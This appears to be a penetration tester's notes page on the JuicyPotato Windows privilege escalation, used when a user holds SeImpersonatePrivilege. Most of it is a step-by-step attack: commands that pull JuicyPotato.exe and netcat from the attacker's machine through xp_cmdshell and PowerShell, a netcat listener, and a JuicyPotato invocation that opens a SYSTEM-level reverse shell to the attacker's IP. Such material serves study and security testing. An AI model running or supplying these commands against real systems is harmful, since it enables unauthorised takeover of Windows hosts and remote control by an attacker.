Skip to content

🥔 JuicyPotato

Escalating privileges to SYSTEM level when the command whoami /priv confirms that SeImpersonatePrivilege is listed for our user.

RottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges. During a Windows build review we found a setup where BITS was intentionally disabled and port 6666 was taken.

Download from: https://github.com/ohpe/juicy-potato

1. Upload the JuicyPotato.exe binary and upload this and nc.exe to the target server. 

1
2
3
4
5
6
# Serve the content from your kali attacking machine
python3 -m http.server 80

# If we have for example a myssql connection 
xp_cmdshell "powershell -c cd C:\Tools; wget http://IPfromOurKali/JuicyPotato.exe -outfile JuicyPotato.exe"
xp_cmdshell "powershell -c cd C:\Tools; wget http://IPfromOurKali/nc64.exe -outfile nc64.exe"

2. Set a listener in your attacking machine:

1
nc -lnvp 1234

3. Run JuicyPotato:

1
2
3
4
5
# From the myssql connection
xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe $IPattackingMachine 1234 -e cmd.exe" -t *

# From a terminal run by an user with SeImpersonatePrivilege:
.\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe  $IPattackingMachine 1234 -e cmd.exe" -t *
Last update: 2025-02-23
Created: February 23, 2025 21:12:05